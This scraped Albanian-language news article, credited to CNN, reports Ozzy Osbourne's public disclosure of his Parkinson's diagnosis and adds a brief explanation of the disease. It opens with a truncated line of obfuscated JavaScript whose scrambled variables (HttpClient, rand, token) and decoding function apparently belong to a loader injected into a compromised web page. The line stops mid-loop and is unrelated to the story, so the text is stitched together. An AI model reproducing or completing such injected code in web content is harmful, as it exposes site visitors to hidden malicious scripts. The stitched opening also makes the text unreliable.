;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Legjenda e muzikës thyen heshtjen për gjendjen e tij shëndetësore

By

Vokalisti kryesor i grupit legjendar “Black Sabbath” më në fund theu heshtjen e tij pas raportimeve për problemet shëndetësore.

“Princi i errësirës” foli publikisht, duke rrëfyer se ai tashmë është diagnostifikuar më sëmundjen e Parkinsonit*.

Në një intervistë me Robin Roberts të “Good Morning America”, që u transmetua të martën, rocker-i legjendar ndau lajmin për diagnozën me gruan e tij Sharon në krah.

Image result for ozzy osbourne

Muzikanti 71-vjeçar tha se zbulimi i sëmundjes së tij ishte çliruese për të.

“Ndihem më mirë tani që e di se vuaj nga Parkinsoni,” tha ai. “Dhe unë thjesht shpresoj që (fansat e mi) të më përkrahin sepse unë kam nevojë për ata.”

Osbourne ka pasur një sërë problemesh që prej vitit të kaluar, përfshirë një infeksion të rëndë për të cilën ai tha se bëri që ai të kishte vitin “më të keq” të jetës së tij.

*Sëmundja e Parkinsonit është një sëmundje progresive e sistemit nervor që ndikon në lëvizje. Simptomat fillojnë gradualisht, ndonjëherë duke filluar me një dridhje mezi të dukshme në vetëm një dorë. Dridhjet janë të zakonshme, por çrregullimi gjithashtu zakonisht shkakton ngurtësi ose ngadalësim të lëvizjes.

Burimi: CNN

 

Artikuj të ngjashëm